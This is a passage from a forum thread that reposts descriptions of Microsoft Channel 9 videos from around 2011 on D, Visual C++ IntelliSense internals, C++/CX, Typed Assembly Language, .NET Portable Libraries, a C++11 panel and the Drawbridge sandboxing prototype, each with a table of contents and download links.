for spending time with C9, Walter and Andrei! Keep pushing the native envelope. "I want 1,000,000 users", says Andrei. Go D! Download D D Forums (written in D) Modern COM Programming in D Table of Contents: [00:00] GoingNative(); //Welcome back! Sorry for the delay. GoingNative 2012. D. [02:22] Charles has a conversation with Andrei Alexandrescu and Walter Bright about the D programming language [56:52] ~GoingNative(); //Charles and Diego talk about D and then destruct. Download: http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-6-The-D-Episode-with-Walter-Bright-and-Andrei-Alexandrescu
  20. Nytro
    [h=1]GoingNative 5: Inside the Visual C++ IDE, Meet Raul Pérez[/h] Posted: Dec 28, 2011 at 10:21 AM By: Charles Happy Holidays to all of you out there who are in some sort of holiday state. If not, then happy holidays anyway from Diego, Charles, C9, and VC We don't cover software testing—the job discipline—often enough on C9. We aim to change that starting now. A friend of Diego's on the VC++ team, Raul Pérez, is a software developer from Puerto Rico who works in QA for the Visual C++ IDE team. He writes tests to make sure the very-front-end of the VC toolchain—the IDE and its design-time compiler infrastructure—works as expected. There's a lot going on when you type characters into the VC++ editor. What happens, exactly? Why? What types of things can make Intellisense fast? What types of things can hinder the performance of the IDE? How does all of this magic happen? There's a compiler involved in all of this. It's not the front-end compiler (cl), but it is a front-end compiler and it compiles your source into data that's stored in a local DB for design-time use by Intellisense, Go-To-Definition, Syntax Coloring, Reference Highlighting, Auto-Completion, etc... All of these things are part of the set of IDE features that make Visual C++ visual... So, meet Raul and learn a thing or two about how the IDE works under the covers and how the system has evolved over time. Table of Contents (click time code links to navigate player accordingly) [00:00] GoingNative();//Getting faster at show construction - still have some optimizations to make... [01:56] Charles interviews Raul about Raul and the VC++ design-time system (Intellisense, Go-to-Definition, Auto-complete, Syntax coloring, etc...) [37:20] ~GoingNative(); //We're really performant this time We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative [at] hotmail [dot] com. We will read and respond to all messages! That's how we roll, brothers and sisters. And if you're a Facebook user, please join our C9::GoingNative Facebook group. Go native! Download: http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-5-Inside-the-Visual-C-ID-Meet-Raul-Prez
  21. Nytro
    [h=1]GoingNative 3: The C++/CX Episode with Marian Luparu[/h] Posted: Oct 26, 2011 at 10:24 AM By: Charles This is the C++/CX episode - everything you ever wanted to know, but were afraid to ask... C++/CX language design team member Marian Luparu sits in the hot seat to answer some questions (a few from the GoingNative community - thank you!), draw on the whiteboard and demo some code. It's all about C++/CX. Tune in. Table of Contents (click time code links to navigate player accordingly) [00:00] GoingNative(); //Welcome. Diego spreads the news. [06:05] Charles interviews Marian Luparu (Whiteboarding included) [43:04] Marian Luparudemos some C++/CX and C++ [58:37] ~GoingNative(); //Charles and Diego recap. Don't fear the hat. We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative at hotmail com. We will read and respond to all messages! That's how we roll, brothers and sisters. If you are a Facebook user, then please join our C9::GoingNative Facebook group. Go native! Download: http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-3-The-CCX-Episode-with-Marian-Luparu
  22. Nytro
    [h=1]Introduction to Typed Assembly Language (TAL)[/h] Posted: May 11, 2011 at 9:33 AM By: Charles Typed Assembly Language (TAL) extends traditional untyped assembly languages with typing annotations, memory management primitives, and a sound set of typing rules. These typing rules guarantee the memory safety, control flow safety, and type safety of TAL programs. Moreover, the typing constructs are expressive enough to encode most source language programming features including records and structures, arrays, higher-order and polymorphic functions, exceptions, abstract data types, subtyping, and modules. Just as importantly, TAL is flexible enough to admit many low-level compiler optimizations. Consequently, TAL is an ideal target platform for type-directed compilers that want to produce verifiably safe code for use in secure mobile code applications or extensible operating system kernels. [Source] You've met Microsoft research scientist and operating system expert Chris Hawblitzel before. He's the architect and lead researcher of the Verve operating system research project from MSR. As you learned in that interview, typed assembly language and Hoare logic were employed to verify the absence of many kinds of errors in low-level code. Chris et al. use TAL and Hoare logic to achieve highly automated, static verification of the safety of Verve. We didn't spend much time on TAL during the Verve interview, so we decided to remedy that. Enter computer scientist and RiSE team member Juan Chen who did much of the TAL work for Verve. After you watch this video, you should read this paper to go much deeper. Tune in and get a sense of what TAL is, how type verification works for assembly code, benefits, trade-offs, and much more. Enjoy. Download: http://ch9files.blob.core.windows.net/ch9/6f8d/5edac2dc-adcc-4b2e-93b7-9ecc016c6f8d/MSRTypedAssemblyLanguage_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/6f8d/5edac2dc-adcc-4b2e-93b7-9ecc016c6f8d/MSRTypedAssemblyLanguage_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/Chris-Hawblitzel-and-Juan-Chen-Introduction-to-Typed-Assembly-Language-TAL
  23. Nytro
    [h=1].NET 4.5: David Kean and Mircea Trofin - Portable Libraries[/h] Posted: Sep 27, 2011 at 10:16 AM By: Charles The Portable Class Library project enables you to write and build managed assemblies that work on more than one .NET Framework platform. You can create classes that contain code you wish to share across many projects, such as shared business logic, and then reference those classes from different types of projects. Using the Portable Class Library project, you can build portable assemblies that work without modification on the .NET Framework, Silverlight, Windows Phone 7, or Xbox 360 platforms. Without the Portable Class Library project, you must target a single platform and then manually rework the class library for other platforms. The Portable Class Library project supports a subset of assemblies from these platforms, and provides a Visual Studio template that makes it possible to build assemblies that run without modification on these platforms. [source = MSDN] The portable libraries project ships as part of Visual Studio 11 Developer Preview. You can build portable .NET class libraries by simply creating a Portable Class Library project (template provided for you) and choosing the platform targets. The IDE will then create the appropriate reference assemblies for you and you can then program as you normally would. Here, we meet Portable Libraries project developer David Kean and program manager Mircea Trofin to learn more. Whiteboarding included. Download: http://ch9files.blob.core.windows.net/ch9/028f/b006b5c5-f3c7-4a37-9747-9f670184028f/NET45VS11InsidePortableLibraries_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/028f/b006b5c5-f3c7-4a37-9747-9f670184028f/NET45VS11InsidePortableLibraries_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/NET-45-David-Kean-and-Marcea-Trofin-Portable-Libraries
  24. Nytro
    [h=1]Herb Sutter, Andrei Alexandrescu and Scott Meyers - C++11[/h] Posted: Oct 04, 2011 at 9:25 AM By: Charles I was able to attend C++ and Beyond 2011 and it was a tremendous experience. The technical depth and C++ goodness was profound and lasted for 3 whole days (and two evenings). Thanks Andrei Alexandrescu, Scott Meyers and Herb Sutter for allowing me to crash your affair with my camera - which was perhaps too big and too advanced for the likes of me - still, I was abe to capture some great content like this panel on C++11 with Scott, Andrei and Herb. Great questions from attendees. Note that this is the first in a series of three panels from C++ and Beyond 2011 that will appear on C9 over the coming months. Make sure to check out all the C&B 2011 content we're lucky enough to have stored on C9 Enjoy! Learn! Table of contents (click on the time code link to move the player to that point in time...): [00:19] When should new C++11 features be adopted in production? [09:28] C++11 Memory Model [15:23] Which C++11 features remain broadly missing? [16:25] When can we expect full C++11 conformance from the major compilers? [19:45] -> Herb Sutter asks YOU a question (please answer on this thread): What do you want the standards committee to work on next? Should they immediately start work on new features? Should they take a break before new feature work? [21:45] What about debugging, linking and tools - as it relates to C++11? [23:56] What really happened to Concepts? [29:07] Will existing code have to be changed just to compile with a new C++11 conforming compiler? [29:38] Why was a seemlingly complicated feature (to implement) like variadic templates rolled out sooner than a seemingly simple feature like templated typedefs? [32:42] What do you think we'll get wrong most often when using C++11 features? [45:13] Return by ref or by value - is there a universal rule of thumb? [48:32] Why don't lambdas have typedefs for argument types? [53:02] How do you capture enclosing scope variables when using lambdas? Download: http://ch9files.blob.core.windows.net/ch9/ecc8/aacddb61-f53f-4264-abb1-9f420166ecc8/CppBeyond11Cpp11Panel_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/ecc8/aacddb61-f53f-4264-abb1-9f420166ecc8/CppBeyond11Cpp11Panel_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/C-and-Beyond-2011-C11-Panel-Scott-Meyers-Andrei-Alexandrescu-and-Herb-Sutter
  25. Nytro
    [h=1]Drawbridge: A new form of virtualization for application sandboxing[/h] Posted: Oct 17, 2011 at 10:27 AM By: Charles Drawbridge is a research prototype of a new form of virtualization for application sandboxing. Drawbridge combines two core technologies: First, a picoprocess, which is a process-based isolation container with a minimal kernel API surface. Second, a library OS, which is a version of Windows enlightened to run efficiently within a picoprocess. Drawbridge combines two ideas from the literature, the picoprocess and the library OS, to provide a new form of computing, which retains the benefits of secure isolation, persistent compatibility, and execution continuity, but with drastically lower resource overheads. The Drawbridge library OS is an experimental Windows 7 library OS - a research project and proving ground for a larger concept: application virtualization and sandboxing. Drawbridge is capable of running the latest releases of major Windows applications such as Microsoft Excel, PowerPoint, and Internet Explorer with very little overhead compared to the traditional virtualization techniques. The experiment is going well! Now, what's going on here, exactly? Drawbridge research team members Galen Hunt, Reuben Olinsky and Jon Howell dig into some of the details, including project rationale and OS architecture, of research project Drawbridge. Paper: Rethinking the Library OS from the Top Down - Microsoft Research Download: http://ch9files.blob.core.windows.net/ch9/f427/abf131e6-cd47-4335-94d8-9e8d000bf427/MSRDrawbridgeAppVirtualizationResearch_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/f427/abf131e6-cd47-4335-94d8-9e8d000bf427/MSRDrawbridgeAppVirtualizationResearch_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/Going+Deep/Drawbridge-An-Experimental-Library-Operating-System
×
×
  • Create New...